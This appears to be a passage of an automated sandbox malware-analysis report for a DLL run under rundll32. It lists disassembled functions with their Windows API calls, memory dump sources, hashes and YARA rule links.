                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction ID: b090516e65dfb2cc0079b63036416f790ce173b21e3ea297a20d0f4a61f138d4
                                                                                                                      • Opcode Fuzzy Hash: 11e397817ce9c23df1d0d820314bfc405a5ae10b9211d558aa096ea116c59da1
                                                                                                                      • Instruction Fuzzy Hash: 0A11DA34600B61FBC711DF68CD88AAAB3B4FB08295F118119E8468B550E3B0ED80D6A0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10015123 Relevance: 6.1, APIs: 4, Instructions: 56threadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                        • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                      • __strdup.LIBCMT ref: 1001514C
                                                                                                                      • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4206445780-0
                                                                                                                      • Opcode ID: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction ID: 8b11c4afa576c4c19aa6f664ae71e644c3fa519ec3c9c99d11d7e99696a9cddb
                                                                                                                      • Opcode Fuzzy Hash: d6edc2b71ccf17cf47a4ad25d9b10d29dc33f6072b75531269d3699570e9d83c
                                                                                                                      • Instruction Fuzzy Hash: C2218EB0801B40DFC722CF7A854525AFBF8FFA4601F14891FE59A8A721DBB4A481CF04
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017709 Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                      • _swprintf.LIBCMT ref: 10017768
                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210924919-0
                                                                                                                      • Opcode ID: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction ID: 7ba363369691fc6b3f3751fa7a143ae8cdd8f79096e01733c6a63758ec2ecc69
                                                                                                                      • Opcode Fuzzy Hash: 0e372276e0ddd26d21c594e6e4fab31a4fe059eb1eed047f827a12fe42e5a10f
                                                                                                                      • Instruction Fuzzy Hash: A601C072500219FBEB00DF648D85FAF73BCEF09704F010429FA05EB181EAB0E90187A5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10017C4C Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                      • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                      • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction ID: 37c567c5ed2abd0c262b3d9c14b2c0b98263367eb1ad4cff580600f06ae044bd
                                                                                                                      • Opcode Fuzzy Hash: edfb174a9e285db0d5a3c51f4831c90a2ac26f0a6dda286db3df881abf1d384e
                                                                                                                      • Instruction Fuzzy Hash: 44112875600219EFDB409F95CA88AAE7BB9FF09390F108069F9099B260DB71DD40CFA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002665D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3354205298-0
                                                                                                                      • Opcode ID: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction ID: 41f5bb3622a22b3bbc1aebe7228573581b0e45adc76bddbe530eb5e3d74ee13d
                                                                                                                      • Opcode Fuzzy Hash: 942ad99b2399d162ae308976561f40286ff473c45cb6fa56c7d9567a3f7ded4b
                                                                                                                      • Instruction Fuzzy Hash: C6111C7690021AEFDF01DF94CC89EDE7BB9FF09245F004061FA04DA011E7719645CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10021616 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                      • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                      • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3704204646-0
                                                                                                                      • Opcode ID: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction ID: b1d6e851d134fb09cc2650d0be1f9f41ce2f018d7dad051a3fdc0e20acdc4583
                                                                                                                      • Opcode Fuzzy Hash: e3eb1482b795a9df1540db4a81f001daf9671be440491e4aa5cb1c9e6ea1c40b
                                                                                                                      • Instruction Fuzzy Hash: 43018479700204BFEB10DBA5DD89F5E7BACEF88750F544055F904CB291EA71EC008B60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100155B8 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • GetFocus.USER32 ref: 10015607
                                                                                                                      • GetParent.USER32(?), ref: 10015615
                                                                                                                      • SendMessageA.USER32 ref: 10015628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4211600527-0
                                                                                                                      • Opcode ID: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction ID: 5e122fa76a0b730552ea88f4d91bd13ac6dffab2f223f6deda68fe1d030935d6
                                                                                                                      • Opcode Fuzzy Hash: a53acda8154667cb3770614629a05d62209f70ffdd5308ba9c3bbb549cf7bdb7
                                                                                                                      • Instruction Fuzzy Hash: 6D118E71100611EFDB20DF60CD8581AB7F6FF88716B54C62DF1568A560D732EC848B91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B96E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2353593579-0
                                                                                                                      • Opcode ID: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction ID: d676a82d7887273777baca2e38fe8b62e8198389fbfbdcd46b7f1d18b22838b9
                                                                                                                      • Opcode Fuzzy Hash: 53b3a67e4a4930d6f35b53cf06474ecb6a52427011bba0ba31954c8fd7e85df7
                                                                                                                      • Instruction Fuzzy Hash: 92012236001A2ABBCF129F919D05EDE3B6AEF49394F004010FE0069120D736C9A2EBA6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001B32D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                      • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                        • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                      • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Item
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 369458955-0
                                                                                                                      • Opcode ID: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction ID: 858530c175d9441ab3e78fa875986bdb84c423c322646567b0054cf47e6755e0
                                                                                                                      • Opcode Fuzzy Hash: 9be62a33154ecf838a8ec693ceb269fba071d7fc85a8faced3965e2d85c2953e
                                                                                                                      • Instruction Fuzzy Hash: 4D01A236101E6AF7DB129F618D05E8F3B99EF453E4F024010FD249D120DB71DBB196A1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003C9F5 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3016257755-0
                                                                                                                      • Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction ID: 43f41ac90f78858b98c9d7795bb0f5538c3c8e7231dcd18d5b884ccf0efad8a7
                                                                                                                      • Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
                                                                                                                      • Instruction Fuzzy Hash: 78013D3640054EBFCF139F86DC41CEE3F66FB19295F558415FA1898121C636DAB1AB82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002BC31 Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3384502665-0
                                                                                                                      • Opcode ID: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction ID: 8ac585039279df4530c17525e78cb38a3c471deb65f2ee77315d7d06ea712387
                                                                                                                      • Opcode Fuzzy Hash: 30c8667133e0e99acdefb8fda4e094958d0ee3b60e94751be478a45e222a3836
                                                                                                                      • Instruction Fuzzy Hash: 15F09671106774BF932157629D8CC9BBF9CFE8F3F5B11052AF549C2100D6629800C6F5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003A545 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                        • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                      • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                      • __lock.LIBCMT ref: 1003A581
                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                      • InterlockedIncrement.KERNEL32(02621520), ref: 1003A5C9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2880340415-0
                                                                                                                      • Opcode ID: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction ID: 227b034a2befce0e561f83ae0ba5e63d07179ac23aa6a18c45afd9c28011782e
                                                                                                                      • Opcode Fuzzy Hash: 77ce0df2017148a369788d84d5d9eaff25b7537eedda72ae9a584ccf42c9de33
                                                                                                                      • Instruction Fuzzy Hash: B2016D35D01E21EFEB42DB65884575D77A0FF067A3F510105E800AF291DB25BA81CBD6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1001DC85 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCB3
                                                                                                                      • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCC0
                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,59F9C18A), ref: 1001DCDB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindFreeLoadLock
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1078018258-0
                                                                                                                      • Opcode ID: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction ID: 2e1bb7004ec06de307aa608eb86a555f9a12e1d63b329185fddd1afba3e53365
                                                                                                                      • Opcode Fuzzy Hash: b40af9f0dfb9db239089461bda16c39fe6d8ad8ad62dd4b4922628693a12339f
                                                                                                                      • Instruction Fuzzy Hash: 74F09676301A126B93417B654E84A7BBB9CEFC65A2701013AFE05D7211EEB1CC45C2A6
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100174CD Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                      • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                      • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                      • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ActiveEnable$FreeResource
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 253586258-0
                                                                                                                      • Opcode ID: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002E206 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
